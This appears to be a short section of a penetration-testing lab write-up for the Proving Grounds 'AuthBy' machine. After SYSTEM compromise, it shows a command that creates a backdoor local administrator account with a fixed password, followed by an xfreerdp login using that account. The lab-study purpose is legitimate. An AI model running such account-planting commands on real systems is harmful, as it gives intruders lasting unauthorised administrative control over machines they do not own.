Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system via token impersonation and kernel exploit
C:\Windows\system32> net user /ADD adm1n Qwer1234 && net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0RDP
Web
/Practice/AuthBy/5-Privilege_Escalation/attachments/{EA8F4CA7-43F5-4A8B-9E38-D47F08082B02}.png)
FTP
/Practice/AuthBy/5-Privilege_Escalation/attachments/{16F4DBFA-0E94-4B10-B9DC-EBDF35E2B632}.png)